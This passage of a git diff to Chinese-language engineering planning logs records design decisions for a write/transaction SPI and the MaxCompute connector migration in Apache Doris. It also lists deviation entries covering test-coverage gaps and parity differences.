复用同类,复用目标仍满足。在设计「`PluginDrivenInsertCommandContext`(或基类)」envelope 内。 + - **D-3(EnvironmentSettings 复用,主线定)= 抽 `MaxComputeDorisConnector.getSettings()`**:决定性证据——legacy `MaxComputeExternalCatalog` 持**单** `settings` 字段同供 scan(`MaxComputeScanNode`)+ write(`MCTransaction.beginInsert`),故抽出共用是**忠实港 legacy 设计**(非投机重构,化解 Rule 3 张力);scan provider :146-162 构造上移、scan/write 共用。连接器 gate 关 dormant,动 scan 零 live 风险。 + - **D-4(insert 机制面,主线定)= `supportsInsert()`=true 余最小化**:MC sink 经 `planWrite`、commit 经 `ConnectorTransaction.commit()`,故 `beginInsert`/`finishInsert`/`getWriteConfig` 留 throwing-default(无 MC 实质活);实际 executor 调用面以 Batch C 为准(不投机加 no-op,Rule 2;显式 doc 不静默,Rule 12)。 + - **D-5(writeContext 编码,主线定)= 静态分区作 `getWriteContext()` 的 col→val map**;overwrite 经 `isOverwrite()`。planWrite 据 ODPS 分区列序拼 `"col=val,..."` 喂 `PartitionSpec`、原样 set 入 `static_partition_spec`(field 10)。 +- **影响**:T04 dormant(gate 关,plan-provider 分支无 live caller);binding 期填充 `PluginDrivenInsertCommandContext.staticPartitionSpec`/overwrite 归 Batch C/D(坑3,`InsertIntoTableCommand:598` 现传空 ctx);planWrite `getCurrentTransaction()` 要返 MC txn ⇒ Batch C `beginTransaction`→置 `ConnectorSessionImpl`。T04 不新增 SPI 面(W1 全建)。立 paimon/iceberg/hive 写-plan adopter 样板。 + +--- + +### D-024 — P4-T03 写/事务 SPI 两 fork(txn id 机制 + T03/T04 边界) + +- **日期**:2026-06-06 +- **状态**:✅ 生效 +- **关联**:[tasks/P4 P4-T03](./tasks/P4-maxcompute-migration.md)、[P4-T03 设计](./tasks/designs/P4-T03-write-txn-design.md)、[D-015]/U3(getTransactionId 连接器分配)、[D-022](写 SPI)、[01-spi-extensions-rfc E11](./01-spi-extensions-rfc.md) +- **背景**:handoff 标注 T03/T04 未逐行定稿;recon 暴两处需拍板的 fork([D-015]「连接器分配 id」对 MC 不成立——MC 无外部 id 且连接器够不到 `Env.getNextId`;写 session 创建需 overwrite/静态分区 context = OQ-2)。 +- **决策**(用户 AskUserQuestion 签字 2026-06-06): + - **Fork 1(txn id)**:给 `ConnectorSession` 加 `default long allocateTransactionId()`(default 抛;fe-core `ConnectorSessionImpl` override 回 `Env.getCurrentEnv().getNextId()`),MC `beginTransaction` 经它分配。**仍属「连接器分配」语义**(经注入的引擎分配器),尊重 [D-015];id 即 Doris 全局 txn_id,与 sink `txn_id` / `GlobalExternalTransactionInfoMgr` 一致。SPI 加面记 E11。 + - **Fork 2(T03/T04 边界)**:ODPS 写 session 创建挪 **T04 planWrite**(`ConnectorWriteHandle` 带 overwrite+writeContext,顺解 OQ-2);**T03 = 纯事务容器**(commitDataList/nextBlockId/writeSessionId 槽 + addCommitData[TBinaryProtocol]/block-alloc/commit[港 finishInsert]/rollback/getUpdateCnt)+ `beginTransaction`。 +- **影响**:executor 接线(`beginTransaction`→`begin(connectorTx)`)+ `GlobalExternalTransactionInfoMgr` 注册推迟翻闸期(Batch C),保 T03 dormant、不破 JDBC/ES。立 paimon/iceberg/hive 后续事务 adopter 的 id-source 样板。 + +--- + +### D-023 — P4 maxcompute 启 full adopter(option A,5 批 cutover) + +- **日期**:2026-06-06 +- **状态**:✅ 生效 +- **关联**:[tasks/P4-maxcompute-migration.md](./tasks/P4-maxcompute-migration.md)、[research/p4-maxcompute-migration-recon.md §9](./research/p4-maxcompute-migration-recon.md)、[D-021](scope=C→本决策接 option A)、[D-022](写 SPI)、[写 RFC §12](./tasks/designs/connector-write-spi-rfc.md)、[R-004] +- **背景**:W-phase(W1–W7)已落地共享写/事务 SPI + 通用层解耦([D-021]/[D-022]),recon §9 scope fork(B hybrid / A full / C 写-SPI 先行)中 C 已完成、写路径 keystone 已解耦。现决 P4 余下走 **option A(full adopter + 翻闸)**,非 P3 式 hybrid。 +- **决策**(用户批准 2026-06-06):按 [tasks/P4](./tasks/P4-maxcompute-migration.md) 的 **5 批 / 11 task** 落地:A 连接器读/DDL/分区 parity(gate 关)→ B 写/事务 SPI(gate 关)→ **C 翻闸(唯一 live 切点,含 R-004 防御测)** → D 清 ~19 反向引用 + 删 `datasource/maxcompute/`(收口 P1-T02 McStructureHelper 去重)→ E 连接器测试基线 + PR。A、B 并行、均 dormant;两者全绿 + R-004 过方进 C。 +- **影响**:P4 成首个 full adopter,为 P5 paimon / P6 iceberg / P7 hive 立样板。recon §3「~36 反向引用」经 post-W-phase re-grep 校正为 **~19**(W-phase 灭 `Coordinator`/`LoadProcessor`/`FrontendServiceImpl` 3 热点 txn 站,grep 证)。每批独立 commit。 + +--- + +### D-022 — 写/事务 SPI 设计(A / B1 / C1 / D / E) + +- **日期**:2026-06-06 +- **状态**:✅ 生效 +- **关联**:[写/事务 SPI RFC](./tasks/designs/connector-write-spi-rfc.md)、[research/connector-write-spi-recon.md](./research/connector-write-spi-recon.md)、[D-021](scope=C)、[D-009](default-only)、[01-spi-extensions-rfc.md E11](./01-spi-extensions-rfc.md)、W-phase commits(W1+W2 `be945476ba7`、W3+W6 `9ad2bbe40ec`、W4 `759cc0874c8`、W5 `9ebe5e27fa4`) +- **背景**:P4 maxcompute recon 证它在热路径会写(`MCTransaction` 在 `Coordinator`/`FrontendServiceImpl`/`LoadProcessor` concrete cast);写路径 = 翻闸 keystone。三现存写者 maxcompute/hive/iceberg 同写生命周期 ⊥ 三处分歧(commit 载荷型 / mc block-id / iceberg procedures+delete/merge),paimon 今读后写需前瞻。须定写/事务 SPI 形状。 +- **决策**(用户签字 2026-06-06): + - **A 事务模型统一·桥接**:连接器 `ConnectorTransaction` 为单一事实源;fe-core 通用写编排经 `PluginDrivenTransaction`(`PluginDrivenTransactionManager` 产)桥接,只调多态 fe-core `Transaction`;现存 `MC/HMS/IcebergTransaction` 过渡期 override 适配,逐连接器迁入 plugin。 + - **B1 commit 载荷 opaque bytes**:BE→FE commit 载荷(`TMCCommitData`/`THivePartitionUpdate`/`TIcebergCommitData`)`TBinaryProtocol` 序列化为 `byte[]`,经 `Transaction.addCommitData(byte[])` / `ConnectorTransaction.addCommitData` 交连接器反序列化。零 BE 改、保全富信息、消除 3 处 concrete cast。留一处序列化 shim(fail-loud,Open-1)。 + - **C1 block-id 窄 callback seam**:`Transaction.supportsWriteBlockAllocation()` + `allocateWriteBlockRange()` 默认方法,仅 maxcompute override,消 `FrontendServiceImpl` `instanceof MCTransaction`。拒 C2 过度泛化 / C3 留特例。 + - **D INSERT/DELETE/MERGE**:SPI 形状定全;实现 mc/hive=insert、iceberg=+delete/merge(P6)。**defer**:iceberg procedures(E2/P6)、hive 行级 ACID、各连接器代码搬迁(adopter 阶段)。 + - **E 写-plan-provider 仿 scan**:连接器经 `ConnectorWritePlanProvider.planWrite()` 产 opaque `TDataSink`(仿 `ConnectorScanPlanProvider`);`Connector.getWritePlanProvider()` default null。 +- **替代方案**:B2 中立 envelope(丢富信息,否决)/ B3 thrift union 漏进 SPI(否决);C2/C3(否决)。见 RFC §11。 +- **影响**:W-phase(W1–W7)落地共享 SPI 面 + 通用层解耦,**behind gate、零行为变更、golden 等价**;逐连接器 adopter(P4 mc / P6 iceberg / P7 hive)后续。新方法均 default(满足 [D-009]),BE 契约不变。W5 落地暴露 [DV-009](写 sink 收口位置修正)。 + +--- + +### D-021 — P4 maxcompute 采 scope=C(写-SPI RFC 先行) + +- **日期**:2026-06-06 +- **状态**:✅ 生效 +- **关联**:[research/p4-maxcompute-migration-recon.md](./research/p4-maxcompute-migration-recon.md)、[写/事务 SPI RFC](./tasks/designs/connector-write-spi-rfc.md)、[D-022](写 SPI 设计)、[connectors/maxcompute.md](./connectors/maxcompute.md) +- **背景**:P4 启动 recon 发现 maxcompute 在热路径**会写**(非只读骨架),写路径是翻闸前提。可选 scope:A 仅迁读+推迟写;B 连写一起但不先定 SPI;**C 写-SPI RFC 先行**(先设计共享写/事务 SPI + 通用层解耦,再迁连接器)。 +- **决策**(用户签字 2026-06-06):采 **scope=C**——先出写/事务 SPI RFC([D-022])并落 **W-phase**(共享解耦 + SPI 面,gate 不动、零行为变更),再做 maxcompute full adopter(搬类 + impl 写 SPI + 翻闸)。理由:写面是 mc/hive/iceberg 共享 keystone,先收口避免每连接器重造、降低反向 instanceof 清理风险。 +- **影响**:P4 在 adopter 前插入 W-phase(写 RFC 直接后续);hive(P7)/iceberg(P6) 复用同一 SPI。W-phase 不翻闸、不搬类、不删 legacy。 + +--- + ### D-020 — 单 `hms` catalog 多格式 scan 路由 = 方案 B(per-table SPI provider) - **日期**:2026-06-05 diff --git a/plan-doc/deviations-log.md b/plan-doc/deviations-log.md index 120465c4142fae..e88790ffce3825 100644 --- a/plan-doc/deviations-log.md +++ b/plan-doc/deviations-log.md @@ -13,10 +13,25 @@ ## 📋 索引 -> 时间倒序;当前共 **7** 项。 +> 时间倒序;当前共 **22** 项。 | 编号 | 偏差主题 | 原计划位置 | 日期 | 当前状态 | |---|---|---|---|---| +| DV-022 | P4-T09 §8:fe-common 去 odps 暴露隐藏传递依赖(依赖卫生,非缺陷)——`odps-sdk-core` 此前**传递**为 fe-common 自身 `DorisHttpException`(io.netty) / `GsonUtilsBase`(com.google.protobuf) 提供 jar;删 odps-sdk-core 后编译暴露缺失,故 fe-common/pom 显式补 `netty-all`+`protobuf-java`(parent dependencyManagement 管版本)。设计 §8 原假设「odps 仅服务 MCUtils」不全 | [Batch-D 设计 §8](./tasks/designs/P4-batchD-maxcompute-removal-design.md) / [D-027] | 2026-06-09 | 🟢 已修正(显式声明,`409300a75b8`)| +| DV-021 | P4-T3:Batch-D 删除后 4 条 Tier-3 接受项(minor,legacy 已删故现为既定行为,非丢数据,用户定接受不修)——**GAP3** CREATE DB 非-IFNE 远端已存→本地预抛 `ERR_DB_CREATE_EXISTS`(1007);**GAP4** DROP TABLE 非-IF-EXISTS+远端缺→通用 `ERR_UNKNOWN_TABLE`(1109);**GAP9** SHOW PARTITIONS `LIMIT`:sort-then-paginate(vs legacy paginate-then-sort,更合 ORDER-BY-LIMIT);**GAP10** partitions() TVF schema-分区零实例表→返 0 行(vs legacy 抛,in-code 注释声明 intentional) | [Batch-D 红线](./task-list-batchD-redline-gaps.md) | 2026-06-09 | 🟢 已登记(Tier-3 接受)| +| DV-020 | P4-T06e FIX-CAST-PUSHDOWN:getSplits 的 limit-suppress wiring + MC 端到端 CAST-strip 无 fe-core 单测(KNOWN-LIMITATION)+ JDBC applyLimit 同类 under-return(OUT-OF-SCOPE 备查)。**① harness gap**:纯静态 `effectiveSourceLimit(limit,stripped)` 已 UT 2 + mutation 2/2(drop-suppression/always-suppress)向红 pin;连接器 `supportsCastPredicatePushdown=false` 已 UT + mutation(false→true 红) pin;但「`getSplits` 据 `filteredToOriginalIndex!=null` 调 `effectiveSourceLimit`」+「`buildRemainingFilter` 对 MC 真剥 CAST conjunct 并保留 BE-only」的端到端 wiring **无 offline 直测**(构造 `PluginDrivenScanNode` 需 harness、本模块缺,同 [DV-015])。覆盖经:strip-when-false 是 fe-core 共享逻辑(JDBC false 分支既覆盖)+ 纯 helper UT/mutation + **live e2e 真值闸**(STRING 列存 `"5"/"05"/" 5"`,`WHERE CAST(code AS INT)=5` 返回全部 3 行 / limit-opt ON+CAST+LIMIT 不 under-return;EXPLAIN 证 CAST 谓词不在下推 filter)。**② OUT-OF-SCOPE(Rule 12 surface)**:JDBC 若 session 关 cast-pushdown 且经 `applyLimit` 推 limit,理论同类 under-return;但 MaxCompute 不 override `applyLimit`(no-op)、F9 的 getSplits limit-param 抑制对 MC 完整,JDBC `applyLimit` 路径非本修范围(pre-existing、非 MC),登记备查、待评估。fail-safe:误关下推退化为多读行交 BE(非丢数据) | [FIX-CAST-PUSHDOWN 设计](./tasks/designs/P4-T06e-FIX-CAST-PUSHDOWN-design.md) / [D-036] | 2026-06-08 | 🟢 已登记(helper+capability UT/mutation;wiring 待 live e2e;JDBC applyLimit 备查)| +| DV-019 | P4-T06e FIX-BATCH-MODE-SPLIT 异步 batch wiring + `computeBatchMode` null-guard 无 fe-core 单测(KNOWN-LIMITATION,NG-7):纯静态四闸 `shouldUseBatchMode` 已 UT 9 + mutation 5/5 向红 pin;但 ① `computeBatchMode` 的 SF-1 `scanProvider != null` null-guard(provider-less full-adopter 防 NPE,跑 dispatch+explain 两路径)与 ② `startSplit` 的 async 分批循环(`getScheduleExecutor` outer/inner CompletableFuture + `SplitAssignment` `needMoreSplit/addToQueue/finishSchedule/setException/isStop` 契约 + init 30s 首-split)+ ③ `numApproximateSplits` 取值——三处 wiring **无 offline 直测**:构造 `PluginDrivenScanNode`(`FileQueryScanNode` 子类)需绕 ctor + stub connector/session/handle/desc/sessionVariable/splitAssignment,本模块无现成轻量 spy/analyze harness(同 [DV-015]/[DV-014] 因)。覆盖经:逐字镜像 legacy `MaxComputeScanNode:214-298`(已验 parity)+ 纯 helper UT/mutation + **大分区 live e2e 真值闸**(EXPLAIN/profile 证 batched/streamed split、规划耗时/内存 ≪ 同步路;阈值边界 `num_partitions_in_batch_mode`=0/大于选中数→回退非-batch;全空选/单分区)。impl-review `wve7y1jst` TQ-1 已据此把测试 javadoc 的「null-provider 已覆盖」声明诚实降级。fail-safe:去 batch 退化为同步 `getSplits`(非丢数据) | [FIX-BATCH-MODE-SPLIT 设计](./tasks/designs/P4-T06e-FIX-BATCH-MODE-SPLIT-design.md) / [D-035] | 2026-06-08 | 🟢 已登记(helper UT+mutation,wiring 待外表 scan harness / live e2e)| +| DV-018 | P4-T06e FIX-POSTCOMMIT-REFRESH cutover post-commit 刷新 swallow 有意分歧于 legacy(无产线逻辑改动,NG-8/F15=F21 minor,regression=no):`PluginDrivenInsertExecutor.doAfterCommit()` 用 try/catch 吞 `super.doAfterCommit()`(=`handleRefreshTable`)刷新失败、INSERT 报 OK;legacy `MCInsertExecutor` 不 override → 异常传播 → 报 FAILED。**cutover 更安全**:按生命周期序数据已落 ODPS/远端、FE 无法回滚,`handleRefreshTable` 只刷 FE 缓存 + 写 external-table refresh editlog(follower 失效提示、非数据真相源)、不碰已提交数据 → 报 FAILED 诱发重试→重复写。**用户定(2026-06-08)接受 + Javadoc 泛化([D-034])、不回退**。改 = 仅 Javadoc(`:164-176`) 从「只讲 JDBC_WRITE」泛化到覆盖 MC connector-transaction 路径(两路径数据均已持久;swallow 最坏只瞬时缓存 stale 自愈;显式注明分歧 legacy)。对抗性安全核查:master 先本地刷新(`RefreshManager:152`)后写 editlog(`:155`),丢 editlog 仅 follower 缓存暂 stale 自愈、无正确性损失/无主从分裂。swallow 路径无新增 UT(注释 only、无可 pin 逻辑变化;异常吞行为 offline 直测受同类 harness 缺位限制,同 [DV-015]);真值闸=CI-skip live e2e(MC INSERT 后人为令 refresh 失败→断言报 OK + warn)。守门 checkstyle 0、import-gate 净 | [FIX-POSTCOMMIT-REFRESH 设计](./tasks/designs/P4-T06e-FIX-POSTCOMMIT-REFRESH-design.md) / [D-034] | 2026-06-08 | 🟢 已登记(无逻辑改动,行为收敛接受;live 真值闸待跑)| +| DV-017 | P4-T06e FIX-ISKEY-METADATA `getTableSchema→buildColumn` wiring 无连接器内单测(KNOWN-LIMITATION):`buildColumn` 助手 isKey=true 不变式已 UT+mutation pin,但两 `getTableSchema` 调用点经 `buildColumn` 的 wiring 无 offline 测——`getTableSchema` deref live `com.aliyun.odps.Table`(唯一 ctor package-private)、模块无 Mockito(同 [DV-014]/[DV-015]/[DV-016] 类);唯一 offline 变通=`com.aliyun.odps` 包内 fixture 子类 override `getSchema()`,repo 无先例(sibling `getColumnHandles` 同样未测)。绕过 `buildColumn`(回退 5 参 ctor)的回归仅由 CI-skip live e2e `DESCRIBE ` 显 Key=YES 捕获(load-bearing gate)。**作用域注**:`information_schema.columns.COLUMN_KEY` 受 `FrontendServiceImpl:962-965` OlapTable 门控、MC 前后皆空、已 parity、out-of-scope(不可断言其变非空);isKey 非纯展示(亦喂 `UnequalPredicateInfer`/BE descriptor),但 legacy 即喂 true → 本修恢复既有值 | [FIX-ISKEY-METADATA 设计](./tasks/designs/P4-T06e-FIX-ISKEY-METADATA-design.md) / [D-033] | 2026-06-08 | 🟢 已登记(helper UT+mutation,wiring 待 live DESCRIBE)| +| DV-016 | P4-T06e FIX-LIMIT-SPLIT-DEFAULT 三点(均 opt-in 默认 OFF、非丢行/非回归):① **CAST-unwrap 致 limit-opt 资格略宽于 legacy**——converter `convert(CastExpr)→convert(child)` 在所有位置剥 CAST(左列/右 literal/IN 元素),故 `CAST(partcol AS T)=lit`、`partcol=CAST(lit AS T)`、`partcol IN (CAST(lit,…))` 经 `checkOnlyPartitionEquality` 判资格,legacy 见原始 `CastExpr` 子节点 instanceof 失败→false;② **嵌套-AND-作单 conjunct 略宽**——converter `flattenAnd` 把单 conjunct `(pt=1 AND region=cn)` 摊平成 flat `ConnectorAnd`→资格,legacy 见 `CompoundPredicate` conjunct→false(与①同安全类,且 conjunct 拆分通常上游已分);③ **`LIMIT 0` 路径差**——本 fix `limit<=0` 拒 limit-opt 走标准多 split 路,legacy `hasLimit()`(`limit>-1`) 走 limit-opt 路;两者皆 0 行、且 `LIMIT 0` 被 Nereids 折成 EmptySet 不可达。①②均纯分区、correctness-safe(裁剪 Nereids `SelectedPartitions` 同算 + 转换后 `filterPredicate` 仍下推 read session 作 backstop,`:191/:208/:353`;LIMIT 无 ORDER BY 无序)。**另**:planScan 两行 wiring(`isLimitOptEnabled(session.getSessionProperties())` + `shouldUseLimitOptimization(...)` 收 live filter/partitionColumnNames)无连接器内单测——`planScan` 需 live odps `Table`、模块无 fe-core/Mockito(同 [DV-014]/[DV-015] 因);纯 helper 全 UT(26)+mutation(8 向红) pin,wiring 半由 CI-skip live E2E 守。**附**:本 fix 实 `checkOnlyPartitionEquality` 同闭 F2/F12(旧恒 false stub minors)| [FIX-LIMIT-SPLIT-DEFAULT 设计](./tasks/designs/P4-T06e-FIX-LIMIT-SPLIT-DEFAULT-design.md) / [D-032] | 2026-06-08 | 🟢 已登记(opt-in 非回归 + 逻辑 UT/mutation,wiring 待 live E2E)| +| DV-015 | P4-T06e FIX-PRUNE-PUSHDOWN 端到端裁剪下推 wiring 无 fe-core 单测(KNOWN-LIMITATION):`getSplits()` pruned-to-zero 短路 + translator `setSelectedPartitions` 注入 + `getSplits→planScan` 6 参 threading 无 fe-core 端到端 UT(连接器 scan 无轻量 analyze/spy harness,同 [DV-014] 因)。逻辑半(`PluginDrivenScanNode.resolveRequiredPartitions` 三态 + `MaxComputeScanPlanProvider.toPartitionSpecs` 转换)已 UT+mutation pin;wiring 半 + 真实裁剪生效由 p2 live `test_max_compute_partition_prune.groovy` 覆盖(真值=EXPLAIN/profile 仅扫目标分区 + `WHERE pt='不存在'`→0 行不建全分区 session)。与既有约定一致(`HiveScanNodeTest` 亦直构 node 测 setter、不经 translator)| [FIX-PRUNE-PUSHDOWN 设计](./tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md) / [D-031] | 2026-06-08 | 🟢 已登记(逻辑 UT+mutation,wiring 待 live;外表 scan analyze/spy harness 落地后补)| +| DV-014 | P4-T06e FIX-BIND-STATIC-PARTITION bind 期投影无 fe-core 单测(KNOWN-LIMITATION):`bindConnectorTableSink` 的 full-schema 投影(NULL 填充 + 分区列在末尾 + 按位置投影)未被 connector-path 单测直接 pin——`bind()` 走 `RelationUtil.getDbAndTable` 真 Env 解析,外表 PluginDriven catalog 需连接器插件,无现成轻量 analyze harness(OLAP analyze 测仅覆盖 `createTable` 内表)。覆盖经:①与 legacy `bindMaxComputeTableSink` 及 Iceberg 路径**共享** helper `getColumnToOutput`/`getOutputProjectByCoercion`(被既有 OLAP/Hive/Iceberg insert 测充分覆盖);②列选择 helper `selectConnectorSinkBindColumns` 单测 + 分布 full-schema 索引测(要求 child full-schema 序方过);③p2 live `test_mc_write_insert` Test 3/3b(部分/重排列名)+ `test_mc_write_static_partitions`。capability 声明/reader 按既有约定不单测(既有 readers 亦仅被 mock)| [FIX-BIND-STATIC-PARTITION 设计](./tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md) / [D-030] | 2026-06-07 | 🟢 已登记(无 harness,parity+p2 覆盖;待外表 analyze harness 落地补)| +| DV-013 | P4-T06e FIX-WRITE-DISTRIBUTION 两处 planner 写分发 parity 微差(均非回归,default `strict` 下与 legacy MC 同果):① `ShuffleKeyPruner` connector 分支缺 `enableStrictConsistencyDml` 短路 → non-strict 下少剪 shuffle-key(更保守 missed optimization);② `enable_strict_consistency_dml=false` 下动态分区 local-sort 被丢(legacy MC 亦丢)| [FIX-WRITE-DISTRIBUTION 设计](./tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md) / [D-029] | 2026-06-07 | 🟢 已登记(非回归,接受)| +| DV-012 | P4-T04 `TMaxComputeTableSink.partition_columns`(field 14) 源:legacy `MaxComputeTableSink` 取 `targetTable.getPartitionColumns()`(fe-core Doris `Column`);连接器 `MaxComputeWritePlanProvider.planWrite` 取 `odpsTable.getSchema().getPartitionColumns()`(odps-sdk 列)——**源不同、值同**(分区列名)| [tasks/P4 P4-T04](./tasks/P4-maxcompute-migration.md) / [P4-T04 设计](./tasks/designs/P4-T04-write-plan-design.md) | 2026-06-06 | 🟢 已落地(P4-T04,值等价)| +| DV-011 | P4-T03 连接器事务 block 上限源:legacy fe-core `Config.max_compute_write_max_block_count`(fe.conf 可调,默认 20000)→ 连接器常量 `MAX_BLOCK_COUNT=20000L`(import-gate 禁 `common.Config`,丢可调性);附 legacy `throws UserException`→`DorisConnectorException`(unchecked,SPI 面无 checked throws)| [tasks/P4 P4-T03](./tasks/P4-maxcompute-migration.md) / [P4-T03 设计](./tasks/designs/P4-T03-write-txn-design.md) | 2026-06-06 | 🟢 已修正(P4-T03 硬编 → GC1 经 session-property 透传恢复 fe.conf 可调,`95575a4954d`)| +| DV-010 | P4-T01 修共享 fe-core `ConnectorColumnConverter.toConnectorType` 丢 CHAR/VARCHAR 长度(写 `precision=0`;长度存 `len` 非 `precision`)→ CREATE TABLE 经 SPI 丢长度。特判 CHAR/VARCHAR 把 `getLength()` 写入 precision 字段(与逆 `convertScalarType`+`MCTypeMapping` 约定一致)| [tasks/P4 P4-T01](./tasks/P4-maxcompute-migration.md) / `ConnectorColumnConverter` | 2026-06-06 | 🟢 已修正(P4-T01)| +| DV-009 | W5 写 sink 收口位置:RFC/handoff「route 3 个 visitPhysicalXxxTableSink + 新建 PluginDrivenTableSink」与代码不符;plugin-driven 写经 `visitPhysicalConnectorTableSink` + 既有 `PluginDrivenTableSink`,W5 改为在其上 layer `planWrite()` | [写 RFC §5.5/§12 W5](./tasks/designs/connector-write-spi-rfc.md) / [HANDOFF W5](./HANDOFF.md) | 2026-06-06 | 🟢 已修正(W5 `9ebe5e27fa4`)| +| DV-008 | P3-T07 parity 两处 SPI↔legacy 偏差:列名 casing 当场修;Hudi meta-field 推迟批 E | [tasks/P3 §批C/T07](./tasks/P3-hudi-migration.md) | 2026-06-05 | 🟢 已修正 | | DV-007 | P3 批 B scope 校正:T05 `listPartitions*` override 推迟批 E(零 live caller、Hive 不 override);T06 MVCC 保持 default opt-out(非抛异常 override)| [HANDOFF 未完成 #1/#2](./HANDOFF.md) / [tasks/P3 T05/T06](./tasks/P3-hudi-migration.md) | 2026-06-05 | 🟢 已修正(T05 裁剪已落地;list*/MVCC 入批 E)| | DV-006 | P3-T03 schema_id/history 非批 A 可修(连接器缺 field-id/InternalSchema/type→thrift;裸基线会回归);推迟批 E | [HANDOFF 1b ①](./HANDOFF.md) / [tasks/P3 T03](./tasks/P3-hudi-migration.md) | 2026-06-05 | 🟡 推迟(批 E)| | DV-005 | P3 hudi「HMS-over-SPI 前置依赖」与代码不符;真阻塞=catalog 模型错配 | [connectors/hudi.md](./connectors/hudi.md) / [master plan §3.4](./00-connector-migration-master-plan.md) / D-005 | 2026-06-04 | 🟡 待修正(P3 模型决策)| @@ -29,6 +44,108 @@ ## 详细记录(时间倒序) +### DV-015 — P4-T06e FIX-PRUNE-PUSHDOWN:端到端裁剪下推 wiring 无 fe-core 单测(KNOWN-LIMITATION) + +- **发现日期**:2026-06-08 +- **发现 session / agent**:FIX-PRUNE-PUSHDOWN clean-room review(workflow `w31i0vfo5`,test-quality lens,4 finding 全 verifier 判 minor/非 must-fix) +- **当前状态**:🟢 已登记(逻辑半 UT+mutation 守门,wiring 半 + 真实裁剪生效待 live e2e) +- **原计划位置**:[FIX-PRUNE-PUSHDOWN 设计](./tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md) §Test Plan +- **偏差描述**:本 fix 三处产线点无 fe-core 端到端 UT:① `PluginDrivenScanNode.getSplits()` 的 pruned-to-zero 短路(`requiredPartitions!=null && isEmpty()→return emptyList()`);② `PhysicalPlanTranslator` plugin 分支 `setSelectedPartitions(fileScan.getSelectedPartitions())` 注入;③ `getSplits→planScan` 6 参 requiredPartitions threading。原因:`PluginDrivenScanNode` 是 `FileQueryScanNode` 子类,裸构造需绕 ctor 链 + stub `getScanPlanProvider`/`buildColumnHandles`/`buildRemainingFilter`/`applyLimit`(无现成轻量 analyze/spy harness;同 [DV-014] 外表 bind harness 缺位)。 +- **覆盖经**:① 最易错的三态映射逻辑(NOT_PRUNED→null / pruned-非空→names / pruned-空→空 list)由 `PluginDrivenScanNodePartitionPruningTest`(5 测)+ mutation(去 `!isPruned` 守卫双红)pin;② 名→PartitionSpec 转换由 `MaxComputeScanPlanProviderTest`(3 测)+ mutation(恒 emptyList 红)pin;③ wiring 半(短路/注入/threading 单变量直线流)+ **真实裁剪生效** 由 p2 live `test_max_compute_partition_prune.groovy` 覆盖——真值证据 = EXPLAIN/profile 仅扫目标分区(split 数/规划耗时 ≪ 全表)+ `WHERE pt='不存在'`→0 行且不建全分区 session。 +- **为何可接受**:与既有约定一致(`HiveScanNodeTest`/legacy-MC/Hudi 的 translator 注入均无 translator 级测,`HiveScanNodeTest:99-115` 直构 node 调 setter);fail-safe(默认 `selectedPartitions=NOT_PRUNED`→`resolveRequiredPartitions`→null→scan all,去 wiring 退化为修前全表扫**非丢数据**)。 +- **影响范围**:仅测试覆盖层;产线行为正确。 +- **关联**:[D-031]、[review-rounds](./reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md)、[复审 §B DG-1](./reviews/P4-maxcompute-full-rereview-2026-06-07.md)、[DV-014](同类 harness 缺位) +- **后续动作**: + - [ ] 待外表 scan 的 fe-core spy/analyze harness 落地(`MaxComputeScanNodeTest`/`PaimonScanNodeTest` 用 `Mockito.spy`+反射,可借鉴),补 `getSplits()` 短路 + threading 的 CI 级测,把 correctness 不变式从 live-only 提到 CI。 + - [ ] **live e2e(必经)**:真实 ODPS 跑 `test_max_compute_partition_prune.groovy`,并核 EXPLAIN/profile 证裁剪真正下推(行正确不足以证——修前行已正确)。 + +### DV-014 — P4-T06e FIX-BIND-STATIC-PARTITION:bind 期 full-schema 投影无 fe-core 单测(KNOWN-LIMITATION) + +> 补登:本条索引行(见上)此前已录,详细记录段遗漏,现补齐(doc-sync 横切债)。 + +- **发现日期**:2026-06-07 +- **发现 session / agent**:FIX-BIND-STATIC-PARTITION clean-room review(workflow `wi3mnjymb`/`wy299gtsh`/`wlwpw0b2s`,test-quality lens) +- **当前状态**:🟢 已登记(无 harness,parity + p2 覆盖;待外表 analyze harness 落地补) +- **原计划位置**:[FIX-BIND-STATIC-PARTITION 设计](./tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md) / [D-030] +- **偏差描述**:`bindConnectorTableSink` 的 full-schema 投影(NULL 填充 + 分区列末尾 + 按位置投影)未被 connector-path 单测直接 pin——`bind()` 经 `RelationUtil.getDbAndTable` 真 Env 解析,外表 PluginDriven catalog 需连接器插件,无现成轻量 analyze harness(OLAP analyze 测仅覆盖 `createTable` 内表)。 +- **覆盖经**:① 与 legacy `bindMaxComputeTableSink` 及 Iceberg 路径**共享** helper `getColumnToOutput`/`getOutputProjectByCoercion`(被既有 OLAP/Hive/Iceberg insert 测覆盖);② 列选择 helper `selectConnectorSinkBindColumns` 单测 + 分布 full-schema 索引测;③ p2 live `test_mc_write_insert` Test 3/3b + `test_mc_write_static_partitions`。 +- **关联**:[D-030]、[review-rounds](./reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md)、[DV-015](同类 harness 缺位) +- **后续动作**:[ ] 待外表 analyze harness 落地补 bind 投影 CI 级测。 + +### DV-013 — P4-T06e FIX-WRITE-DISTRIBUTION:两处 planner 写分发 parity 微差(均非回归) + +- **发现日期**:2026-06-07 +- **发现 session / agent**:FIX-WRITE-DISTRIBUTION clean-room review(workflow `ww1g95bba`,Phase A parity/delivery lens) +- **当前状态**:🟢 已登记(非回归,接受;default `enable_strict_consistency_dml=true` 下与 legacy MC 同果) +- **原计划位置**:[FIX-WRITE-DISTRIBUTION 设计](./tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md)(§"Known minor divergence — ShuffleKeyPruner" + §"Why no change in RequestPropertyDeriver") +- **偏差描述**: + - **① ShuffleKeyPruner**:`ShuffleKeyPruner.visitPhysicalConnectorTableSink`(通用 connector 分支,`:286-295`)缺 legacy `visitPhysicalMaxComputeTableSink`(`:272-283`)的 `enableStrictConsistencyDml==false → childAllowShuffleKeyPrune=true` 短路;通用分支恒 `required.equals(ANY)?true:false`。 + - **② local-sort under non-strict**:`enable_strict_consistency_dml=false` 时 `RequestPropertyDeriver` 对 connector sink(required≠GATHER)下推 `ANY` → 动态分区 hash+local-sort 需求被丢。 +- **为何非回归**:default 